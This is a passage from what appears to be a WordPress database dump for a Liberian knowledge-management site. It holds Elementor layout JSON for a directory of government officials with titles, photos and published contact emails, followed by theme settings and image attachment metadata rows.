href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>Monitoring, Control, and Surveillance Field Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>Small Scale Fisheries Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23562,3430,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1627536069;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3038;}i:1;a:1:{s:2:\"id\";i:2956;}i:2;a:1:{s:2:\"id\";i:2801;}}}}'),(23563,3430,'_edit_lock','1611578248:42'),(23564,3430,'_last_editor_used_jetpack','block-editor'),(23565,3431,'_wp_attached_file','2021/01/epa.png'),(23566,3431,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2021/01/epa.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"epa-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"epa-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"epa-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23569,3430,'_thumbnail_id','3431'),(23570,3430,'_edit_last','42'),(23571,3430,'ocean_gallery_link_images','off'),(23572,3430,'ocean_sidebar','0'),(23573,3430,'ocean_second_sidebar','0'),(23574,3430,'ocean_disable_margins','enable'),(23575,3430,'ocean_display_top_bar','default'),(23576,3430,'ocean_display_header','default'),(23577,3430,'ocean_center_header_left_menu','0'),(23578,3430,'ocean_custom_header_template','0'),(23579,3430,'ocean_header_custom_menu','0'),(23580,3430,'ocean_menu_typo_font_family','0'),(23581,3430,'ocean_disable_title','default'),(23582,3430,'ocean_disable_heading','default'),(23583,3430,'ocean_disable_breadcrumbs','default'),(23584,3430,'ocean_display_footer_widgets','default'),(23585,3430,'ocean_display_footer_bottom','default'),(23586,3430,'ocean_custom_footer_template','0'),(23587,3430,'ocean_link_format_target','self'),(23588,3430,'ocean_quote_format_link','post'),(23589,3430,'osh_disable_topbar_sticky','default'),(23590,3430,'osh_disable_header_sticky','default'),(23591,3430,'osh_sticky_header_style','default'),(23592,3433,'_jetpack_related_posts_cache','a:1:{s:32:\"bfc62710165ed7b51223b165689d40a3\";a:2:{s:7:\"expires\";i:1612213467;s:7:\"payload\";a:2:{i:0;a:1:{s:2:\"id\";i:68;}i:1;a:1:{s:2:\"id\";i:74;}}}}'),(23593,3433,'_edit_lock','1612182534:42'),(23594,3433,'_last_editor_used_jetpack','block-editor'),(23595,3433,'_edit_last','42'),(23596,3433,'ocean_sidebar','0'),(23597,3433,'ocean_second_sidebar','0'),(23598,3433,'ocean_disable_margins','enable'),(23599,3433,'ocean_display_top_bar','default'),(23600,3433,'ocean_display_header','default'),(23601,3433,'ocean_center_header_left_menu','0'),(23602,3433,'ocean_custom_header_template','0'),(23603,3433,'ocean_header_custom_menu','0'),(23604,3433,'ocean_menu_typo_font_family','0'),(23605,3433,'ocean_disable_title','default'),(23606,3433,'ocean_disable_heading','default'),(23607,3433,'ocean_disable_breadcrumbs','default'),(23608,3433,'ocean_display_footer_widgets','default'),(23609,3433,'ocean_display_footer_bottom','default'),(23610,3433,'ocean_custom_footer_template','0'),(23611,3433,'osh_disable_topbar_sticky','default'),(23612,3433,'osh_disable_header_sticky','default'),(23613,3433,'osh_sticky_header_style','default'),(23614,3438,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1628321657;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3117;}i:1;a:1:{s:2:\"id\";i:3534;}i:2;a:1:{s:2:\"id\";i:2956;}}}}'),(23615,3438,'_edit_lock','1611932295:42'),(23616,3438,'_last_editor_used_jetpack','block-editor'),(23617,3439,'_wp_attached_file','2021/01/gender.png'),(23618,3439,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:531;s:4:\"file\";s:18:\"2021/01/gender.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"gender-300x156.png\";s:5:\"width\";i:300;s:6:\"height\";i:156;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"gender-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"gender-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23621,3438,'_thumbnail_id','3439'),(23622,3438,'_edit_last','42'),(23623,3438,'ocean_gallery_link_images','off'),(23624,3438,'ocean_sidebar','0'),(23625,3438,'ocean_second_sidebar','0'),(23626,3438,'ocean_disable_margins','enable'),(23627,3438,'ocean_display_top_bar','default'),(23628,3438,'ocean_display_header','default'),(23629,3438,'ocean_center_header_left_menu','0'),(23630,3438,'ocean_custom_header_template','0'),(23631,3438,'ocean_header_custom_menu','0'),(23632,3438,'ocean_menu_typo_font_family','0'),(23633,3438,'ocean_disable_title','default'),(23634,3438,'ocean_disable_heading','default'),(23635,3438,'ocean_disable_breadcrumbs','default'),(23636,3438,'ocean_display_footer_widgets','default'),(23637,3438,'ocean_display_footer_bottom','default'),(23638,3438,'ocean_custom_footer_template','0'),(23639,3438,'ocean_link_format_target','self'),(23640,3438,'ocean_quote_format_link','post'),(23641,3438,'osh_disable_topbar_sticky','default'),(23642,3438,'osh_disable_header_sticky','default'),(23643,3438,'osh_sticky_header_style','default'),(23644,3441,'_wp_attached_file','2021/01/118007112_312462773531184_4445376849983355021_n.jpg'),(23645,3441,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:557;s:6:\"height\";i:680;s:4:\"file\";s:59:\"2021/01/118007112_312462773531184_4445376849983355021_n.jpg\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118007112_312462773531184_4445376849983355021_n-246x300.jpg\";s:5:\"width\";i:246;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118007112_312462773531184_4445376849983355021_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23646,3442,'_wp_attached_file','2021/01/118024845_312462840197844_9178285810187896342_o.jpg'),(23647,3442,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1948;s:6:\"height\";i:1164;s:4:\"file\";s:59:\"2021/01/118024845_312462840197844_9178285810187896342_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118024845_312462840197844_9178285810187896342_o-300x179.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:179;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"118024845_312462840197844_9178285810187896342_o-1024x612.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:612;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118024845_312462840197844_9178285810187896342_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118024845_312462840197844_9178285810187896342_o-768x459.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:459;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:60:\"118024845_312462840197844_9178285810187896342_o-1536x918.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:918;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23648,3443,'_wp_attached_file','2021/01/118031965_312462886864506_7678681092268067942_o.jpg'),(23649,3443,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1732;s:6:\"height\";i:1045;s:4:\"file\";s:59:\"2021/01/118031965_312462886864506_7678681092268067942_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118031965_312462886864506_7678681092268067942_o-300x181.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:181;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"118031965_312462886864506_7678681092268067942_o-1024x618.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:618;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118031965_312462886864506_7678681092268067942_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118031965_312462886864506_7678681092268067942_o-768x463.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:463;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\